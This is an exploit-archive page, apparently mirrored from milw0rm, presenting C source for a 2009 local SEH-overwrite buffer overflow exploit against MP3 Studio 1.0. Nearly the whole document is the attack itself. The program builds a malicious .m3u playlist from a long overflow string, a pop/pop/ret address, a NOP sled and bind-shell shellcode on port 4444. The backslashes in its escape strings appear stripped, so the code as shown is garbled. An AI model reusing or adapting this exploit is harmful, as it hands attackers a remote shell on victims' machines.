MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit
# Published : 2009-09-14
# Author : dmc
# Previous Title : Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC
# Next Title : Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]

/* mplode.c vs MP3 Studio v1.0
 * Tested on: Windows 2000 SP4
 *
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 *
 * PoC: http://www.milw0rm.com/exploits/9277
 * The PoC author said he could not exploit it so I decided to try.
 *
 * A bit of fun for a boring night in Peterborough :(
 * Good luck finding someone who uses this media player.
 */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>

#define usage(){ (void)fprintf(stderr, "MPlode vs MP3 Studio v1.0n(C) dmc <dmc@deadbeef.co.uk>nnExample: mplode.exe [output file]n");}
#define error(e){ (void)fprintf(stderr,"%sn",e); return -1;}

// bind shell lport = 4444
char shellcode[] =
	"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
	"x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
	"x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
	"xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
	"x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
	"x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
	"xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
	"xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
	"x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
	"x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
	"xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
	"xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
	"x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
	"x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
	"xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
	"x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
	"xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
	"x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
	"x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
	"x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
	"x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
	"xa4x7dx2ex7fx27x82xf8x80";

char *seh = "xC4x2Ax02x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "xebx10x90x90";
// short jmp nop nop

int main(int argc, char *argv[])
{
	char outfile[20];
	if(argc < 2)
	{
		usage();
		return 0;
	}

	if(strlen(argv[1])<15)
	{
		strncpy(outfile, argv[1], 14);
		outfile[14] = '';
	}
	else strcpy(outfile, "mplode.m3u");

	FILE *fp = fopen(outfile, "w");
	if (!fp) error("[*] Cannot output filen");

	fwrite("http://", 7, 1, fp);
	for (int i=0; i<4103; i++)
	{
		fwrite("x41", 1, 1, fp);
	}
	
	fwrite(nextseh, 4, 1, fp);
	fwrite(seh, 4, 1, fp);
	
	for (int i=0; i<500; i++)
	{
		fwrite("x90", 1, 1, fp);
	}
	
	fwrite(shellcode, sizeof(shellcode), 1, fp);

	fclose(fp);

	fprintf(stderr, "MPlode vs MP3 Studio v1.0n(C) dmc <dmc@deadbeef.co.uk>nn", outfile);
	fprintf(stderr, "[*] Success, exploit written to %sn", outfile);

	exit(0);

	return 0;
}

// www.Syue.com [2009-09-14]